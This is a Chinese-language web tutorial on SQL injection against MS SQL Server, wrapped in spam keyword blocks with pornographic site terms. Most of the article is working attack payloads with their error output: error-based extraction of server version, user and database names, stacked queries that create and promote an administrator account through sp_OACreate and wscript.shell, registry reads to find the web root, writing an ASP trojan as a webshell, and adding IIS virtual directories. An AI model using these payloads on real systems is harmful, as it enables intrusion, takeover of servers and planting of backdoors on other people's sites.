日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

榨干MS SQL Server 最后一滴血

瀏覽:263日期:2023-10-29 12:37:53

風云變換的網絡,網絡安全讓人們不能不關注它。數據庫,讓我們不得不想起強大的ORACLE,MS SQL。微軟的漏洞最多,今天就用SQL INJECTION來讓MS SQL為我們好好的工作。

以下(使用一知名網站作為測試點),相信大家對SQL爆庫,爆表,爆字段都已掌握,在這里就不多說這方面了。

MS SQL內置函數介紹:

@@VERSION 獲得Windows的版本號,MS SQL的版本號,補丁。 User_name() 得到當前系統的連接用戶 Db_name() 得到當前連接的數據庫 HOST_NAME() 得到當前主機的名稱

這些信息有助我們對系統進行簡單的了解

好,下面我們就開始吧!

語句:

http://www.xxx.com/list.asp?classid=1'

返回信息:

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14' 字符串 ' Order By Id DESC' 之前有未閉合的引號。 /list.asp,行290;

從這里未閉合的引號(“’”),我們可以確定存在SQL INJECTION。發現在漏洞當然接著走了,利用以上介紹的函數為我們工作了:

語句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select @@version)

返回:

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07' 將 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 轉換為數據類型為 int 的列時發生語法錯誤。 /list.asp,行290;

相關的信息出來了,MS SERVER ADVANCED SERVER 2000+SP4, SQL 2000+SP3,從MS SQL SERVER 后面的8.00.760可看出是SP3補丁。看了服務器的信息,接下應該了解數據庫的權限了:

語句:

http://www.xxx.com/list.asp?classid=1 and user_name()=’dbo’

返回: 正常返回的信息

確定是權限是DBO,從表面DBO權限的連接用戶經常是涉及SYSADMIN服務器角色成員。說明數據庫服務器角色成員組默認是在每個數據庫增加一個DBO用戶。

返回原理根1=1,1=2相似..這里只是權限測試,我們也把它爆出來看看:

語句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select user_name())

返回:

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07' 將 nvarchar 值 'dbo' 轉換為數據類型為 int 的列時發生語法錯誤。 /list.asp,行290;

說明連接數據庫的用戶權限很高,可以確定是服務器角色組中的成員。

語句:http://www.xxx.com/list.asp?classid=1 and 0<>(select db_name())—返回:Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07' 將 nvarchar 值 'GameIMGSys' 轉換為數據類型為 int 的列時發生語法錯誤。 /list.asp,行290

這樣就可以爆出當前的數據庫。得到這么高權限的數據庫連接成員,我們當然想直接得到WEBSHELL,或是直接拿到NT ADMIN。NT ADMIN取決于當前服務器的配置,如果配置不合理的服務器,我們要直接拿NT ADMIN,拿NT ADMIN就要用到:

MSSQL內置存儲過程:

sp_OACreate (通過它,危害很得更大,但是需要有SYSADMINS權限才可能使用) sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_SetPropertysp_OAStop

由于MS SQL一次可以執行多語句,使得我們有機會使用更多的語句。

語句:

http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user cntest chinatest /add'

正常返回。(提示:如果主機上shell存在的話那將在服務器上創建一個cntest的用戶)

創建用戶了,語句后再加個net localgroup administrators cntest /add加到管理組中。 如果對方的機子開著3389端口,或IPC的話,那接下來的事,就不用我多說了。

遇到專業型主機,只開一個80端口,那應該怎么辦呢?當然,我們還是可能拿到WEBSHELL,再慢慢滲透的。

由于權限高,我們可能先建表,寫入ASP木馬的數據再通過MAKEWEBTASK,得到WEBSEHLL.手工寫入的程序太過于繁鎖,上傳WEBSHELL最大的問題還是網頁目錄,現在網上已經有現成的工具通過BACKUP,和MASKWEBTASK的工具得到WEBSHELL了。以下推薦,獲取網頁路徑(通過存儲過程達到對注冊表的讀取):

利用內置存儲過程 xp_regread(讀取注冊表鍵值,權限public):

語句:

http://www.xxx.com/list.asp?classid=1;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test);

IIS的默認路徑的在注冊表中HKEY_LOCAL_MACHINE SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots

利用爆字段將數據庫的值讀出來:

語句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)

返回:

Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]將 varchar 值 'E:www,,201' 轉換為數據類型為 int 的列時發生語法錯誤。;

這說明網頁目錄在E:www,接下來也可以利用FSO直接寫入ASP木馬(提示必須擁用SYSADMIN權限才可使用FSO和FSO開入的前提下) :

語句:

http://www.xxx.com/list.asp?class=1;declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',%20@o%20out%20exec%20sp_oamethod%20@o,%20'createtextfile',%20@f%20out,%20'e:wwwtest.asp',1%20exec%20@ret%20=%20sp_oamethod%20@f,%20'writeline',%20NULL,%20'On Error Resume Next'

在E:WWW下創建一個test.asp并寫入On Error Resume next語句:

http://www.xxx.com/list.asp?classid=1;declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',%20@o%20out%20exec%20sp_oamethod%20@o,%20'opentextfile',%20@f%20out,%20'e:wwwtest.asp',8%20exec%20@ret%20=%20sp_oamethod%20@f,%20'writeline',%20NULL,%20'asp horse '

在E:WWWtest.asp增加一行記錄,記錄為asp horse, 整個完整木馬可能這樣寫入。(%百分號要用%25替代寫入)。如果得不到網頁目錄,怎么辦呢?前提你要猜到網站是否使用默認WEB,或者使用域名作為WEB。

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,’ cscript.exe c:inetpubwwwrootmkwebdir.vbs -w '默認 Web 站點' -v 'e','e:'’;

在默認的WEB站點下創建一個虛擬目錄E,指向E:盤下。

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,’ cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse’

給虛擬目錄e加上瀏覽屬性不錯吧。給自己開虛擬服務。想那些網頁目錄路徑,頭都快破了。這下給自己一個天開眼了。那傳WEBSHELL利用MS SQL為我們的工作告了一段落了,接下來工作應該由你來了。

標簽: Sql Server 數據庫
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
欧美亚洲三级| 亚洲乱亚洲高清| 国产调教精品| 青草国产精品| 日本免费在线视频不卡一不卡二| 综合激情网...| 蜜臀av亚洲一区中文字幕| 好吊一区二区三区| 红桃视频国产一区| 亚洲少妇一区| 首页欧美精品中文字幕| 久久最新视频| 亚洲2区在线| 亚洲免费福利一区| 热久久久久久| 久久三级中文| 精品日韩视频| 精品日韩毛片| 国产免费成人| 日韩中文字幕视频网| 婷婷视频一区二区三区| 日韩黄色在线观看| 国产精品资源| 97精品视频在线看| 久久亚洲在线| 久久国产88| 欧美一区91| 精品视频久久| 中文字幕成在线观看| 久久中文视频| 亚洲免费观看高清完整版在线观| 欧美日韩91| 国语对白精品一区二区| 国产在线|日韩| 视频一区二区中文字幕| 国产日韩欧美在线播放不卡| 国产精品99一区二区三| 久久激情网站| 亚洲精品黄色| 精品日韩在线| 尤物在线精品| 国产日韩1区| 神马午夜久久| 午夜在线视频观看日韩17c| 91欧美极品| 免费在线小视频| 免费人成精品欧美精品| 国产精品久久久久久久久久齐齐| 精品国产免费人成网站| 亚洲一区成人| 久久精品99久久久| 一区二区精品伦理...| 国产农村妇女精品一二区| 国产精品日韩精品在线播放| 久久久久久久久久久9不雅视频| 蜜臀av亚洲一区中文字幕| 美女精品久久| 狠狠久久婷婷| 国产精品亚洲欧美| 亚洲福利一区| 69堂精品视频在线播放| 91精品xxx在线观看| 亚洲aa在线| 麻豆精品蜜桃| 国产欧美日韩影院| 亚洲精品小说| 国产极品一区| 久久最新视频| 成人日韩在线| 国产伦理一区| 久久国产高清| 日韩av免费| 国产精品久久久久久久久久齐齐 | 欧美日韩精品一本二本三本 | 精品国产精品国产偷麻豆| 影音国产精品| 激情黄产视频在线免费观看| 日韩一区二区三区精品| 神马日本精品| 欧美成人aaa| 久久国产精品毛片| 中文在线资源| 国产日韩欧美中文在线| 欧美专区在线| 久久蜜桃av| 国内精品麻豆美女在线播放视频| 亚洲人成毛片在线播放女女| 久久婷婷一区| 国产一区不卡| 国产欧美另类| 免费日本视频一区| 91精品一区国产高清在线gif| 国产精品激情电影| 亚洲精品影视| 激情欧美一区二区三区| 精品国产精品国产偷麻豆 | 亚洲精品在线二区| 夜夜嗨网站十八久久 | 国产精品高颜值在线观看| 日韩精品三区四区| 一区二区自拍| 久久香蕉国产| 日韩电影免费网址| 精品日韩在线| 麻豆精品视频在线| 国产三级精品三级在线观看国产| 久久亚洲风情| 国产一区日韩欧美| 免费高潮视频95在线观看网站| 国产乱码精品一区二区三区四区 | 91亚洲国产高清| 国产精品观看| 欧美日韩 国产精品| 亚洲免费福利一区| 视频在线在亚洲| 亚洲一区欧美二区| 在线一区视频| 精品一区三区| 999国产精品永久免费视频app| 欧美国产精品| 麻豆精品视频在线观看免费| 国产丝袜一区| 日韩激情一区二区| 日韩精品一区二区三区av| 香蕉成人久久| 久久国产精品久久久久久电车| 亚洲高清影视| 国产色综合网| 亚洲免费影视| 人人精品人人爱| 亚洲一区有码| 日韩精品亚洲专区| 青草久久视频| 国产精品4hu.www| 国产精品伊人| 久久av偷拍| 精品亚洲免a| 国产乱码午夜在线视频| 免费福利视频一区二区三区| 日韩和的一区二在线| 99视频精品视频高清免费| 1000部精品久久久久久久久| 午夜欧美在线| 石原莉奈在线亚洲三区| 日韩国产一区二| 久久av中文| 在线天堂中文资源最新版| 久久久天天操| 尹人成人综合网| 久热精品在线| 欧美日韩一区二区三区在线电影| 国产精品日韩精品在线播放 | 亚洲特色特黄| 亚洲一区免费| 欧美永久精品| 久久精品欧洲| 久久激情婷婷| 免费在线视频一区| 91麻豆精品激情在线观看最新 | 青草国产精品| 国产精品一区二区精品视频观看| 你懂的亚洲视频| 日韩欧美看国产| 亚洲欧美日韩高清在线| av一区二区高清| 少妇精品久久久一区二区| 国产精品久久久亚洲一区| 国产精品久久久久蜜臀| 亚洲第一精品影视| 天堂久久av| 久久久免费人体| 久久久精品五月天| 综合激情一区| 精品三级国产| 亚洲欧美日韩国产一区二区| 亚洲精选久久| 国产在线一区不卡| 黄色亚洲在线| 麻豆精品蜜桃视频网站| 性欧美69xoxoxoxo| 久久国产乱子精品免费女| 国产精品成人一区二区不卡| 日韩午夜一区| 国产精品欧美大片| 国产主播一区| 国产精品亚洲欧美一级在线| 亚洲午夜一级| 欧美日韩1区| 激情欧美丁香| 免费在线观看一区| 黄色国产精品| 精品免费在线| 一本综合精品| 精品欧美一区二区三区在线观看| 亚洲ww精品| 999精品一区| 国产精品宾馆| 美女精品在线| 日本精品影院| 国产精品xvideos88|